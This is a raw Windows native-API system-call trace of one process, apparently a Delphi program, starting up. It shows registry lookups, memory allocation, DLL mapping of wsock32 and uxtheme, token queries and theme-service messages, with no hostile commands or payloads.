 00368   748   NtDeviceIoControlFile  (44, 0, 0x0, 0x0, 0x390008,  (44, 0, 0x0, 0x0, 0x390008, "P\37f\27{\266\207i\374\211\223\213\372\216\214\303\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ...
 00369   748   NtQuerySystemInformation  (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0
 00370   748   NtQuerySystemInformation  (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0
 00371   748   NtQuerySystemInformation  (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0
 00372   748   NtQuerySystemInformation  (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0
 00373   748   NtQuerySystemInformation  (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0
 00374   748   NtQuerySystemInformation  (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0
 00375   748   NtQuerySystemInformation  (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH
 00376   748   NtCreateKey  (0x2, {24, 0, 0x240, 0, 0,  (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147482740, 2, ) }, 0, 0x0, 0, ... -2147482740, 2, ) == 0x0
 00377   748   NtSetValueKey  (-2147482740,  (-2147482740, "Seed", 0, 3, "\336"\325\204\221\314\260Q\24\264\244\376\16\257\245\7j%\341\200\363?\200\366\204N\354\320\35\235\35>\330\345/b\212\12\266\2756v=\4\224\326\266\230\204\213\333\6\33\363y\35\341O\27\25\12\376\213\267\321\33Y[\247hP\321,\21\323$Z;l", 80, ... ) , 0, 3,  (-2147482740, "Seed", 0, 3, "\336"\325\204\221\314\260Q\24\264\244\376\16\257\245\7j%\341\200\363?\200\366\204N\354\320\35\235\35>\330\345/b\212\12\266\2756v=\4\224\326\266\230\204\213\333\6\33\363y\35\341O\27\25\12\376\213\267\321\33Y[\247hP\321,\21\323$Z;l", 80, ... ) \325\204\221\314\260Q\24\264\244\376\16\257\245\7j%\341\200\363?\200\366\204N\354\320\35\235\35>\330\345/b\212\12\266\2756v=\4\224\326\266\230\204\213\333\6\33\363y\35\341O\27\25\12\376\213\267\321\33Y[\247hP\321,\21\323$Z;l", 80, ... ) == 0x0
 00378   748   NtClose  (-2147482740, ... ) == 0x0
 00368   748   NtDeviceIoControlFile  ... {status=0x0, info=256},  ... {status=0x0, info=256}, "WZ\31A\250H\316\201\330\311:\371;X\261\376\270c\241\2300"ih(v\323\36\354\306\274\3\324\350\330\0\342\2#\23l\361\277s2{a\22\3652wZfx\351\234k\\366SE\25/h\12\322\203\357\303\22\274\344i\274\256=\241$\22\271\206\230\2619&\257\332\342\253YKL*\275\20\343\224l\177uw\255>(H\300\365&\23\322\210\225\376\216\302\13W {#<\322d@7\356P\253>]\217\305Ae\30\242a\276\341\30p2]\340r\6&\245\205)db\246\273\26\275y2\5\22\37=\323\237}q\323\231\273R\242\35\302\365\237\224\327\301\331B\315\375\324)\23y\377o\313~\242\24We\24\363\307re\310\36113\231\35\372\1\353\373}\233\262t\235\4\212\257\5\323\301\236l\10\317\11\374?\213\216\371Q\225\335\233\263@kbk\200CBZ6\245\352{\24_0@<\203\337[9", ) ih(v\323\36\354\306\274\3\324\350\330\0\342\2#\23l\361\277s2{a\22\3652wZfx\351\234k\\366SE\25/h\12\322\203\357\303\22\274\344i\274\256=\241$\22\271\206\230\2619&\257\332\342\253YKL*\275\20\343\224l\177uw\255>(H\300\365&\23\322\210\225\376\216\302\13W {#<\322d@7\356P\253>]\217\305Ae\30\242a\276\341\30p2]\340r\6&\245\205)db\246\273\26\275y2\5\22\37=\323\237}q\323\231\273R\242\35\302\365\237\224\327\301\331B\315\375\324)\23y\377o\313~\242\24We\24\363\307re\310\36113\231\35\372\1\353\373}\233\262t\235\4\212\257\5\323\301\236l\10\317\11\374?\213\216\371Q\225\335\233\263@kbk\200CBZ6\245\352{\24_0@<\203\337[9", ) == 0x0
 00379   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00380   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00381   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Control\Session Manager"}, ... 48, ) }, ... 48, ) == 0x0
 00382   748   NtQueryValueKey  (48,  (48, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (48, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) }, 16, ) == 0x0
 00383   748   NtClose  (48, ... ) == 0x0
 00384   748   NtOpenKey  (0x20019, {24, 16, 0x40, 0, 0,  (0x20019, {24, 16, 0x40, 0, 0, "Software\Microsoft\Ole"}, ... 48, ) }, ... 48, ) == 0x0
 00385   748   NtQueryValueKey  (48,  (48, "RWLockResourceTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00386   748   NtClose  (48, ... ) == 0x0
 00387   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00388   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00389   748   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 00390   748   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 00391   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface"}, ... 48, ) }, ... 48, ) == 0x0
 00392   748   NtQueryValueKey  (48,  (48, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00393   748   NtQueryValueKey  (48,  (48, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00394   748   NtQueryValueKey  (48,  (48, "InterfaceHelperDisableTypeLib", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00395   748   NtClose  (48, ... ) == 0x0
 00396   748   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}"}, ... 48, ) }, ... 48, ) == 0x0
 00397   748   NtQueryValueKey  (48,  (48, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00398   748   NtQueryValueKey  (48,  (48, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00399   748   NtClose  (48, ... ) == 0x0
 00400   748   NtOpenDirectoryObject  (0x2000f, {24, 0, 0x40, 0, 0,  (0x2000f, {24, 0, 0x40, 0, 0, "\BaseNamedObjects"}, ... 48, ) }, ... 48, ) == 0x0
 00401   748   NtOpenEvent  (0x1f0003, {24, 48, 0x0, 0, 0,  (0x1f0003, {24, 48, 0x0, 0, 0, "HookSwitchHookEnabledEvent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00402   748   NtUserRegisterWindowMessage  ( ("{FB8F0821-0164-101B-84ED-08002B2EC713}", ... ) , ... ) == 0xc077
 00403   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00404   748   NtOpenKey  (0x9, {24, 16, 0x40, 0, 0,  (0x9, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT\UserEra"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00405   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00406   748   NtTestAlert  (... ) == 0x0
 00407   748   NtContinue  (1244464, 1, ...
 00408   748   NtSetInformationThread  (-2, Win32StartAddress(LpcReceivedMessageId), {StartAddress(LpcReceivedMsgId)=0x401000,}, 4, ... ) == 0x0
 00409   748   NtAllocateVirtualMemory  (-1, 0, 0, 196608, 4096, 64, ... 3538944, 196608, ) == 0x0
 00410   748   NtAllocateVirtualMemory  (-1, 0, 0, 196608, 4096, 64, ... 3735552, 196608, ) == 0x0
 00411   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 196608, ) == 0x0
 00412   748   NtAllocateVirtualMemory  (-1, 0, 0, 1350, 4096, 4, ... 3538944, 4096, ) == 0x0
 00413   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 4096, ) == 0x0
 00414   748   NtAllocateVirtualMemory  (-1, 0, 0, 148480, 4096, 4, ... 3538944, 151552, ) == 0x0
 00415   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 151552, ) == 0x0
 00416   748   NtAllocateVirtualMemory  (-1, 0, 0, 2560, 4096, 4, ... 3538944, 4096, ) == 0x0
 00417   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 4096, ) == 0x0
 00418   748   NtAllocateVirtualMemory  (-1, 0, 0, 3584, 4096, 4, ... 3538944, 4096, ) == 0x0
 00419   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 4096, ) == 0x0
 00420   748   NtAllocateVirtualMemory  (-1, 0, 0, 8704, 4096, 4, ... 3538944, 12288, ) == 0x0
 00421   748   NtFreeVirtualMemory  (-1, (0x360000), 0, 32768, ... (0x360000), 12288, ) == 0x0
 00422   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "version.dll"}, ... 52, ) }, ... 52, ) == 0x0
 00423   748   NtMapViewOfSection  (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c00000), 0x0, 32768, ) == 0x0
 00424   748   NtClose  (52, ... ) == 0x0
 00425   748   NtProtectVirtualMemory  (-1, (0x77c01000), 304, 4, ... (0x77c01000), 4096, 32, ) == 0x0
 00426   748   NtProtectVirtualMemory  (-1, (0x77c01000), 4096, 32, ... (0x77c01000), 4096, 4, ) == 0x0
 00427   748   NtFlushInstructionCache  (-1, 2009075712, 304, ... ) == 0x0
 00428   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\version.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00429   748   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "wsock32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00430   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\wsock32.dll"}, 1242940, ... ) }, 1242940, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00431   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wsock32.dll"}, 1242940, ... ) }, 1242940, ... ) == 0x0
 00432   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wsock32.dll"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0
 00433   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 52, ... 56, ) == 0x0
 00434   748   NtQuerySection  (56, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00435   748   NtClose  (52, ... ) == 0x0
 00436   748   NtMapViewOfSection  (56, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x71ad0000), 0x0, 36864, ) == 0x0
 00437   748   NtClose  (56, ... ) == 0x0
 00438   748   NtProtectVirtualMemory  (-1, (0x71ad1000), 52, 4, ... (0x71ad1000), 4096, 32, ) == 0x0
 00439   748   NtProtectVirtualMemory  (-1, (0x71ad1000), 4096, 32, ... (0x71ad1000), 4096, 4, ) == 0x0
 00440   748   NtFlushInstructionCache  (-1, 1907167232, 52, ... ) == 0x0
 00441   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wsock32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00442   748   NtQueryPerformanceCounter  (... {924392386, 10}, {3579545, 0}, ) == 0x0
 00443   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00444   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 56, ) == 0x0
 00445   748   NtQueryInformationToken  (56, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00446   748   NtClose  (56, ... ) == 0x0
 00447   748   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 56, ) }, ... 56, ) == 0x0
 00448   748   NtSetInformationObject  (56, Handle, {Inherit=0,ProtectFromClose=1,}, 1179904, ... ) == 0x0
 00449   748   NtOpenKey  (0xf003f, {24, 56, 0x40, 0, 0,  (0xf003f, {24, 56, 0x40, 0, 0, "Software\Borland\Locales"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00450   748   NtOpenKey  (0xf003f, {24, 56, 0x40, 0, 0,  (0xf003f, {24, 56, 0x40, 0, 0, "Software\Borland\Delphi\Locales"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00451   748   NtOpenProcessToken  (-1, 0x8, ... 52, ) == 0x0
 00452   748   NtQueryInformationToken  (52, Statistics, 56, ... {token info, class 10, size 56}, 56, ) == 0x0
 00453   748   NtClose  (52, ... ) == 0x0
 00454   748   NtUserCallOneParam  (0, 41, ... ) == 0x4
 00455   748   NtAllocateVirtualMemory  (-1, 1335296, 0, 4096, 4096, 4, ... 1335296, 4096, ) == 0x0
 00456   748   NtAllocateVirtualMemory  (-1, 0, 0, 1048576, 8192, 1, ... 9895936, 1048576, ) == 0x0
 00457   748   NtAllocateVirtualMemory  (-1, 1339392, 0, 4096, 4096, 4, ... 1339392, 4096, ) == 0x0
 00458   748   NtAllocateVirtualMemory  (-1, 9895936, 0, 16384, 4096, 4, ... 9895936, 16384, ) == 0x0
 00459   748   NtUserCallNoParam  (29, ...
 00460   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1242224, ... ) }, 1242224, ... ) == 0x0
 00461   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0
 00462   748   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 52, ... 60, ) == 0x0
 00463   748   NtClose  (52, ... ) == 0x0
 00464   748   NtMapViewOfSection  (60, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x3c0000), 0x0, 221184, ) == 0x0
 00465   748   NtClose  (60, ... ) == 0x0
 00466   748   NtUnmapViewOfSection  (-1, 0x3c0000, ... ) == 0x0
 00467   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1242532, ... ) }, 1242532, ... ) == 0x0
 00468   748   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 5, 96, ... 60, {status=0x0, info=1}, ) }, 5, 96, ... 60, {status=0x0, info=1}, ) == 0x0
 00469   748   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 60, ... 52, ) == 0x0
 00470   748   NtQuerySection  (52, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00471   748   NtClose  (60, ... ) == 0x0
 00472   748   NtMapViewOfSection  (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x5ad70000), 0x0, 229376, ) == 0x0
 00473   748   NtClose  (52, ... ) == 0x0
 00474   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 1300, 4, ... (0x5ad71000), 4096, 32, ) == 0x0
 00475   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 4096, 32, ... (0x5ad71000), 4096, 4, ) == 0x0
 00476   748   NtFlushInstructionCache  (-1, 1524043776, 1300, ... ) == 0x0
 00477   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 1300, 4, ... (0x5ad71000), 4096, 32, ) == 0x0
 00478   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 4096, 32, ... (0x5ad71000), 4096, 4, ) == 0x0
 00479   748   NtFlushInstructionCache  (-1, 1524043776, 1300, ... ) == 0x0
 00480   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 1300, 4, ... (0x5ad71000), 4096, 32, ) == 0x0
 00481   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 4096, 32, ... (0x5ad71000), 4096, 4, ) == 0x0
 00482   748   NtFlushInstructionCache  (-1, 1524043776, 1300, ... ) == 0x0
 00483   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 1300, 4, ... (0x5ad71000), 4096, 32, ) == 0x0
 00484   748   NtProtectVirtualMemory  (-1, (0x5ad71000), 4096, 32, ... (0x5ad71000), 4096, 4, ) == 0x0
 00485   748   NtFlushInstructionCache  (-1, 1524043776, 1300, ... ) == 0x0
 00486   748   NtOpenKey  (0x80000000, {24, 0, 0x40, 0, 0,  (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uxtheme.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00487   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00488   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00489   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00490   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 52, ) == 0x0
 00491   748   NtQueryInformationToken  (52, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00492   748   NtClose  (52, ... ) == 0x0
 00493   748   NtOpenKey  (0x2001f, {24, 0, 0x640, 0, 0,  (0x2001f, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 52, ) }, ... 52, ) == 0x0
 00494   748   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\ThemeManager"}, ... 60, ) }, ... 60, ) == 0x0
 00495   748   NtQueryValueKey  (60,  (60, "Compositing", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00496   748   NtClose  (60, ... ) == 0x0
 00497   748   NtClose  (52, ... ) == 0x0
 00498   748   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 00499   748   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 52, ) == 0x0
 00500   748   NtQueryInformationToken  (52, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 00501   748   NtClose  (52, ... ) == 0x0
 00502   748   NtOpenKey  (0x20019, {24, 0, 0x640, 0, 0,  (0x20019, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... 52, ) }, ... 52, ) == 0x0
 00503   748   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "Control Panel\Desktop"}, ... 60, ) }, ... 60, ) == 0x0
 00504   748   NtQueryValueKey  (60,  (60, "LameButtonText", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00505   748   NtClose  (60, ... ) == 0x0
 00506   748   NtClose  (52, ... ) == 0x0
 00507   748   NtUserGetProcessWindowStation  (... ) == 0x1c
 00508   748   NtUserGetObjectInformation  (28, 2, 1244320, 64, 1244316, ... ) == 0x1
 00509   748   NtUserGetGUIThreadInfo  (748, 1244340, ... ) == 0x1
 00510   748   NtConnectPort  ( ("\ThemeApiPort", {12, 2, 1, 1}, 0x0, 0x0, 1244184, 64, ... 52, 0x0, 0x0, 0x0, 64, ) , {12, 2, 1, 1}, 0x0, 0x0, 1244184, 64, ... 52, 0x0, 0x0, 0x0, 64, ) == 0x0
 00511   748   NtRequestWaitReplyPort  (52, {32, 56, new_msg, 0, 0, 0, 0, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57974, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 484, 748, 57974, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57974, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00512   748   NtRequestWaitReplyPort  (52, {32, 56, new_msg, 0, 0, 0, 0, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\355\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57975, 0} "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 484, 748, 57975, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\355\3\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57975, 0} "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00513   748   NtUserCallNoParam  (29, ...
 00514   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1241580, ... ) }, 1241580, ... ) == 0x0
 00513   748   NtUserCallNoParam  ... ) == 0x0
 00515   748   NtUserSystemParametersInfo  (41, 0, 1524240760, 0, ... ) == 0x1
 00516   748   NtGdiHfontCreate  (1243708, 356, 0, 0, 1333048, ... ) == 0x330a04e1
 00517   748   NtGdiHfontCreate  (1243708, 356, 0, 0, 1333040, ... ) == 0x520a0634
 00518   748   NtRequestWaitReplyPort  (52, {32, 56, new_msg, 0, 0, 0, 0, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57976, 0} "\0\0\0\0\0\0\0\0<\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ... {32, 56, reply, 0, 484, 748, 57976, 0}  (52, {32, 56, new_msg, 0, 0, 0, 0, 0} "\7\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {32, 56, reply, 0, 484, 748, 57976, 0} "\0\0\0\0\0\0\0\0<\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" )  ) == 0x0
 00519   748   NtMapViewOfSection  (60, -1, (0x0), 0, 0, {0, 0}, 0, 1, 0, 2, ... (0xa70000), {0, 0}, 327680, ) == 0x0
 00520   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00521   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00522   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00523   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00524   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00525   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00526   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00527   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00528   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00529   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00530   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00531   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00532   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00533   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00534   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00535   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00536   748   NtUserGetWindowDC  (0, ... ) == 0x1010051
 00537   748   NtGdiCreatePatternBrushInternal  (59048383, 0, 0, ... ) == 0x72100798
 00538   748   NtUserCallOneParam  (16842833, 57, ... ) == 0x1
 00539   748   NtUserCallNoParam  (29, ...
 00540   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1241020, ... ) }, 1241020, ... ) == 0x0
 00539   748   NtUserCallNoParam  ... ) == 0x0
 00541   748   NtUserCallNoParam  (29, ...
 00542   748   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\uxtheme.dll"}, 1241016, ... ) }, 1241016, ... ) == 0x0
 00541   748   NtUserCallNoParam  ... ) == 0x0
 00459   748   NtUserCallNoParam  ... ) == 0x1
 00543   748   NtOpenKey  (0x2000000, {24, 16, 0x40, 0, 0,  (0x2000000, {24, 16, 0x40, 0, 0, "System\CurrentControlSet\Services\WinSock2\Parameters"}, ... 64, ) }, ... 64, ) == 0x0
 00544   748   NtQueryValueKey  (64,  (64, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (64, "WinSock_Registry_Version", Partial, 144, ... TitleIdx=0, Type=1, Data="2\0.\00\0\0\0"}, 20, ) }, 20, ) == 0x0
